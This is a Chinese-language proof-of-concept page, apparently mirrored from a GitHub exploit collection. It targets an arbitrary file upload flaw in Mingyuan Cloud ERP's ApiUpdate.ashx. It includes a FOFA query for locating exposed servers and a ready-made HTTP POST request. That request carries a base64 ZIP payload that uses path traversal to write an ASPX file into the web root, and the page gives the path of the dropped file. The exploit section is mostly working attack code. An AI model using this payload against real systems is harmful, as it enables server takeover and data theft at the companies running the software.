admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/明源云erp/明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

2.8 KiB
Raw Blame History

明源云ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞

一、漏洞简介

明源云ERP系统是一个云端部署的ERP系统具有高效、灵活和可定制的特点。它支持多种自定义功能包括表单、报表、流程等企业可以根据自身业务需求进行个性化定制提高管理效率与操作便捷性。同时该系统提供丰富的移动端应用员工可以随时随地进行业务操作、数据查询与报表分析实现高效协同提高企业运营效率。此外明源云ERP系统还具有精确的财务数据管理功能通过集成各个财务子模块实现财务数据的自动收集、整理和汇总并自动生成准确的财务报表。总之明源云ERP系统是一个高效、灵活、可定制的ERP系统可以满足企业的个性化需求并实现高效协同和精确的财务数据管理。明源云ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞攻击者通过构造特殊的ZIP压缩包可以上传任意文件控制服务器。

二、影响版本

  • 明源云ERP系统接口管家

三、资产测绘

  • fofa(body="hibot.js" || title="明源云ERP")
  • 特征

1705156735709-3c67057a-1062-4d33-ae3f-c47d2ecec7b8.png

四、漏洞复现

POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 

{{base64_decode("UEsDBBQAAAAIAPKaC1eX6YtyjAAAAJMAAAAeAAAALi4vLi4vLi4vZmRjY2xvdWQvXy9jaGVjay5hc3B4JMzLCsIwFATQXwmRQrsJCt1IqyiKUPBRWsT1bRhqIWliHoJ/b8TdMGeYOtuxlkawM81jTGHDDwvOsm2doNHWuMCupOEtyWT9xwdo0dz+E9YlMLOHeLgpIOdSlstyNax5UZ0mBXGEQup7uDecuJBtKTzzDq8IH8TdKbEfvFEx4AdFUaXbLwAAAP//AwBQSwECFAMUAAAACADymgtXl+mLcowAAACTAAAAHgAAAAAAAAAAAAAAAAAAAAAALi4vLi4vLi4vZmRjY2xvdWQvXy9jaGVjay5hc3B4UEsFBgAAAAABAAEATAAAAMgAAAAAAA==")}}

1705156776315-0a29ef7c-c666-4373-934e-151a99603e60.png

上传文件位置

/fdccloud/_/check.aspx

1705156800899-0428c6e3-5187-49bc-b37b-52efb3f6a0bd.png

Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar

1705156847091-4e04f815-6782-4825-9a31-03bd550bb8e2.png

1705156862381-a0bb1008-1a00-4eed-b5ae-0e91d0dbbb0b.png

更新: 2024-02-29 23:55:42
原文: https://www.yuque.com/xiaokp7/ocvun2/wlaowua3lmsbig8l